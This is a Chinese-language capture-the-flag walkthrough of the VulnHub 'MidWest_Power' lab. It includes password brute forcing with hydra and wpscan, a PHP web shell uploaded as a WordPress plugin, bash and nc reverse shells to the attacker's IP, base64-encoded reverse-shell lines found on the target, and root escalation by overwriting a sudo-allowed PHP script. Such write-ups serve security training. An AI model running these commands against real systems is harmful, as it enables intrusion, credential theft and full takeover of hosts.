MidWest_Power

ip a

192.168.241.181

信息搜集

靶机发现

sudo nmap -sn  192.168.241.0/24

目标靶机 ip 为 192.168.241.184

端口发现

sudo nmap -sT --min-rate 10000 -p-  192.168.241.184 -oA nmapscan/ports

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

渗透打点

端口扫描

sudo nmap -sT -sV -sC -O -p22,80 192.168.241.184 -oA nmapscan/detail

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 31:62:bb:fc:87:9a:39:01:96:54:03:18:bb:03:bc:90 (RSA)
|   256 4d:21:68:a0:58:a4:18:27:ba:bd:29:ba:a7:91:bc:35 (ECDSA)
|_  256 77:ce:55:b4:87:93:dc:4c:05:6e:67:90:3f:78:d0:64 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.6
|_http-title: Midwest Power – Powering the future!
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:D9:5D:BC (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

UDP 扫描

sudo nmap -sU --top-ports 20 192.168.241.184 -oA nmapscan/udp

PORT      STATE         SERVICE
68/udp    open|filtered dhcpc
123/udp   open          ntp
135/udp   open|filtered msrpc
138/udp   open|filtered netbios-dgm
162/udp   open|filtered snmptrap
445/udp   open|filtered microsoft-ds
500/udp   open|filtered isakmp
631/udp   open|filtered ipp
1900/udp  open|filtered upnp
4500/udp  open|filtered nat-t-ike

漏洞扫描

sudo nmap --script=vuln -p22,80 192.168.241.184 -oA nmapscan/vuln

PORT     STATE  SERVICE
22/tcp   open   ssh
80/tcp   open   http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.241.184
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.241.184:80/
|     Form id: 
|_    Form action: http://www.midwest.htb/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /wp-login.php: Possible admin folder
|   /readme.html: Wordpress version: 2 
|   /: WordPress version: 5.6
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|_  /readme.html: Interesting, a readme.

渗透测试

基础情况

只有一个 web 服务 , 运行的是 wordpress 5.6 的服务 是一个新能源公司
简单看了一下跳转
是前往的一个 www.midwest.htb 的网址
本地绑定一下 hosts 文件

发现 login : http://www.midwest.htb/wp-login.php

用 wpscan 跑一下

sudo wpscan --url http://www.midwest.htb/ -e u

[+] admin


sudo wpscan --url http://www.midwest.htb/ --enumerate u --usernames ./user.txt --passwords /usr/share/wordlists/rockyou.txt

目录爆破

sudo gobuster dir -u http://www.midwest.htb/ --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

/wp-includes/ 文件很多且大部分无法显示

/nagios 401

nagios 是什么
是个网络监控工具

nagios

curl http://www.midwest.htb/nagios
This site is asking you to sign in.

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you are authorized to access the document requested.  Either you supplied the wrong credentials (e.g., bad password), or your browser doesn't understand how to supply the credentials required.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at www.midwest.htb Port 80</address>
</body></html>

这里也需要账号密码

vulnhub 提示是有涉及到爆破
wordpress 的账密没爆出来 这里可能可以
https://dev59.com/askubuntu/ka_lNIkBSVA65lAchAWB#google_vignette
nagios 的默认账号是 nagiosadmin, 结合之前的 admin 一块使用

nagiosadmin
admin

sudo hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.241.184 http-get /nagios -t 32

字典太慢了 根本爆不动
网上找不到现成的 nagios 的字典
这里自己搓一个

字典生成

首先读取首页等地方的字符串

sudo cewl http://www.midwest.htb/  -d 2 -w nagios.txt

然后使用 John 进行一个排列组合 避免密码较强的情况

john -rules -wordlist=nagios.txt -stdout | sort | uniq > pass.txt

现在就有一个相对很完善的一个字典了

进行爆破

sudo hydra -L user.txt -P pass.txt 192.168.241.184 http-get /nagios -t 32

[80][http-get]
host: 192.168.241.184
login: nagiosadmin   password: PowerPower

成功
顺便跑一个博客看看

sudo wpscan --url http://www.midwest.htb/ --enumerate u --usernames ./wpuser.txt --passwords pass.txt

[!] Valid Combinations Found:
| Username: admin, Password: Power9

ok

Nagios XI

Nagios® Core™
Version 4.4.6 in Nagios XI

system config 里面有一些服务 check 的命令 但是没法修改

WP

登录 有邮件验证 选择稍后提醒 成功进入后台
只有一个 admin 用户

没有发现插件 更新内容是两个主题文件 没找到上传点
但是 Plugins 下面有 add plugins 的选择
可以 upload
传一个小马进去看看

plugins

If you have a plugin in a .zip format, you may install or update it by uploading it here

应该类似于之前打的主题 zip 覆盖 这里尝试写一个 php 小马 压缩后上次看看效果

Installing plugin from uploaded file: test.zip

Unpacking the package…

Installing the plugin…

The package could not be installed. No valid plugins were found.

Plugin installation failed.

https://stackoverflow.com/questions/10563782/wordpress-plugin-installation-fail#:~:text=Click%20on%20%E2%80%9Cupload%20file%20%28s%29%E2%80%9D%20and%20upload%20the,and%20go%20to%20the%20dashboard.%20Click%20on%20%E2%80%9CPlugins%E2%80%9D

文章中有人回答

It seems you have put wrong folder/file. wordpress only get realized that there is a plugin when it can get a php file which header contain at lease this line

/* Plugin name: your plugin name */

So, you have to check..

- unzip the plugin file and see if there any php file containing header like that. you plugin file should be in.. wp-content/PLUGIN_DIRECTORY/PLUGIN_FILE.php

check this first and let us know if it works or not

所以我给 php 加个自己的签名看看

<?php
/* plugin name: test */
system($_GET['cmd']);
phpinfo();
?>

Installing plugin from uploaded file: test.zip

Unpacking the package…

Installing the plugin…

Plugin installed successfully.

成功传入, Active plugins
成功看到 phpinfo, 但是页面很卡顿 这里写一个 revshell

<?php
/* plugin name: rev */
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.241.181/443 0>&1'");
phpinfo();
?>

拿到 shell

提权

www-data

root:x:0:0:root:/root:/bin/bash
nagios:x:1001:1001::/home/nagios:/bin/bash
administrator,,,:/var/lib/postgresql:/bin/bash

shellinabox:x:115:123:
Shell In A Box,,,:/var/lib/shellinabox:/usr/sbin/nologin

这里没有找到常规服务器提权的地方
因为有 nagios , 考虑找一下提权 cve

首先 nagios 的安装位置默认是在 /usr/local/src
在靶机中存在于 /usr/local/ 下
且有 nagios 和 nagios xi 两个文件夹

drwxr-xr-x  8 root     root     4096 Jan 22  2021 nagios
drwxr-xr-x 10 root     nagios   4096 Jan 22  2021 nagiosxi
drwxr-xr-x  5 www-data www-data 4096 Jan 22  2021 nagvis

/nagios/etc
cat nagios.cfg
# MODIFIED
admin_email=root@localhost
admin_pager=root@localhost
translate_passive_host_checks=1
log_event_handlers=0
use_large_installation_tweaks=1
enable_environment_macros=0
...
broker_module=/usr/local/nagios/bin/ndo.so /usr/local/nagios/etc/ndo.cfg

nagios 很可能带我提权 root

/usr/local/nagiosxi/etc
cat htpasswd.users

nagiosadmin:{SHA}CR5yxS528yxH6d4rAwgvtKyuAvM=
nagiosxi:{SHA}L21ZSH6P9HEpeFEW312EItg4fkY=


/usr/local/nagiosxi/var
cat xi-sys.cfg
htpasswdbin='/usr/bin/htpasswd'
mkdirbin='/bin/mkdir'
mrtgcfg='/etc/mrtg/mrtg.cfg'
pgsqlrootpass='postgres'
pgsqlpass='nagiosxi'
php_extension_dir='/usr/lib64/php/modules'


cat config.inc.php
<?php
// DB-specific connection information
$cfg['db_info'] = array(
    "nagiosxi" => array(
        "dbtype" => 'mysql',
        "dbserver" => '',
        "user" => 'nagiosxi',
        "pwd" => 'n@gweb',
        "db" => 'nagiosxi',
        "charset" => "utf8"

www-data@midwest:/usr/local/nagios/libexec$ ls
ls
;echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTM0LzQ0NDQ0IDA+JjE= | base64 -d | bash;#
;echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMjM0LzQ0NDQ0IDA+JjE= | base64 -d | bash;#
check_apt
check_asterisk.pl
...
check_wmi_plus_help.pl
check_xi_sla.php
check_xml.php
check_yum
custom_check_mem
custom_check_procs
folder_watch.pl
negate
process_perfdata.pl
remove_perfdata
send_nsca
urlize
utils.pm
utils.sh

发现了数据库的凭证和之前在 nagios 前端显示的一些 check 命令
其中有两个 base64 的加密字符串?

解密看看

bash -i >& /dev/tcp/192.168.1.134/44444 0>&1

bash -i >& /dev/tcp/192.168.1.234/44444 0>&1

1592732 -rwxr-xr-x 1 www-data nagios    ;echo 111 | base64 -d | bash;#
1592713 -rwxr-xr-x 1 www-data nagios    ;echo 222 | base64 -d | bash;#

发现这两个非常明显反弹 shell 的信息
其他文件基本都是二进制的 很难改变

去配置文件里面找一下

/usr/local/nagios/etc/services
cat localhost.cfg 

define service {
    host_name              localhost
    service_description    Current Load
    use                    local-service
    check_command          check_local_load!5.0,4.0,3.0!10.0,6.0,4.0
    register               1
}

define service {
    host_name              localhost
    service_description    Current Users
    use                    local-service
    check_command          check_local_users!20!50
    register               1
}

define service {
    host_name              localhost
    service_description    HTTP
    use                    local-service
    check_command          check_http
    register               1
}

define service {
    host_name              localhost
    service_description    Memory Usage
    use                    local-service
    check_command          check_local_mem!30!20
    register               1
}

define service {
    host_name              localhost
    service_description    PING
    use                    local-service
    check_command          check_ping!100.0,20%!500.0,60%
    register               1
}

define service {
    host_name              localhost
    service_description    Root Partition
    use                    local-service
    check_command          check_local_disk!20%!10%!/
    register               1
}

define service {
    host_name              localhost
    service_description    Service Status - crond
    use                    local-service
    check_command          check_xi_service_status!crond!!!!!!
    register               1
}

define service {
    host_name              localhost
    service_description    Service Status - httpd
    use                    local-service
    check_command          check_xi_service_status!httpd!!!!!!
    register               1
}

define service {
    host_name              localhost
    service_description    Service Status - mysqld
    use                    local-service
    check_command          check_xi_service_status!mysqld!!!!!!
    register               1
}

define service {
    host_name              localhost
    service_description    SSH
    use                    local-service
    check_command          check_ssh
    register               1
}

define service {
    host_name              localhost
    service_description    Swap Usage
    use                    local-service
    check_command          check_local_swap!50%!30%
    register               1
}

define service {
    host_name              localhost
    service_description    Total Processes
    use                    local-service
    check_command          check_local_procs!400!500!RSZDT
    register               1
}

这里对应上了在 http://192.168.241.184/nagios/ > configuration > services 看到的服务

check_local_load
check_local_users 1
check_http
check_local_mem
check_pingcat
check_local_disk
check_xi_service_status
check_ssh 1
check_local_swap
check_local_procs

重点看看这几个正在运行的服务, 看能不能类似定时任务写入反弹 shell (nagios 的)

cat 翻了一下只有 check_local_users 和 check_ssh 存在(但是都是二进制文件)
另外还有 custom_check_mem , custom_check_procs

那就往这 2 个可读的 bash 脚本中写入反弹 shell 的脚本 用 4443 端口

echo "bash -i >& /dev/tcp/192.168.241.181/4443 0>&1" > custom_check_mem 

echo "bash -i >& /dev/tcp/192.168.241.181/4443 0>&1" > custom_check_procs

还是不行 收不到反弹 shell

查了一下需要用 nc?

echo 'nohup nc -e /bin/bash 192.168.241.181 4443 &' >custom_check_mem

可能是因为没有加 nohup 被系统杀进程了

nagios

nagios@midwest:/home/nagios$ cat user.txt
7ec306b6fa01510ffc4e0d0fac97c23e

User nagios may run the following commands on midwest:
(root) NOPASSWD: /etc/init.d/nagios start
(root) NOPASSWD: /etc/init.d/nagios stop
(root) NOPASSWD: /etc/init.d/nagios restart
(root) NOPASSWD: /etc/init.d/nagios reload
(root) NOPASSWD: /etc/init.d/nagios status
(root) NOPASSWD: /etc/init.d/nagios checkconfig
(root) NOPASSWD: /etc/init.d/npcd start
(root) NOPASSWD: /etc/init.d/npcd stop
(root) NOPASSWD: /etc/init.d/npcd restart
(root) NOPASSWD: /etc/init.d/npcd reload
(root) NOPASSWD: /etc/init.d/npcd status
(root) NOPASSWD: /usr/bin/php
    /usr/local/nagiosxi/scripts/components/autodiscover_new.php *
(root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/components/getprofile.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/upgrade_to_latest.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/change_timezone.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_services.sh *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/reset_config_perms.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_ssl_config.sh *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/backup_xi.sh *

CVE-2020-28900  – 通过upgrade_to_latest.sh将Nagios Fusion和XI特权从Nagios升级到root, 但是具体细节没有找到
但是既然这么多 , ls 看一下权限就好办了

/etc/init.d/nagios
/etc/init.d/npcd
/usr/bin/php
/usr/local/nagiosxi/scripts/components/autodiscover_new.php
/usr/bin/php
/usr/local/nagiosxi/scripts/send_to_nls.php
/usr/local/nagiosxi/scripts/components/getprofile.sh
/usr/local/nagiosxi/scripts/upgrade_to_latest.sh
/usr/local/nagiosxi/scripts/change_timezone.sh
/usr/local/nagiosxi/scripts/manage_services.sh
/usr/local/nagiosxi/scripts/reset_config_perms.sh
/usr/local/nagiosxi/scripts/manage_ssl_config.sh
/usr/local/nagiosxi/scripts/backup_xi.sh

ls -liah /usr/bin/php
1584510 lrwxrwxrwx 1 root root 21 Jan 22  2021 /usr/bin/php -> /etc/alternatives/php

273778 -rwxr-xr-x 1 nagios nagios 1.5K Jan 22  2021 /usr/local/nagiosxi/scripts/send_to_nls.php

写入提权命令

echo '<?php system("/bin/bash");?>' > /usr/local/nagiosxi/scripts/send_to_nls.php

sudo /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *

root

cat root.txt
0d599f0ec05c3bda8c3b8a68c32a1b47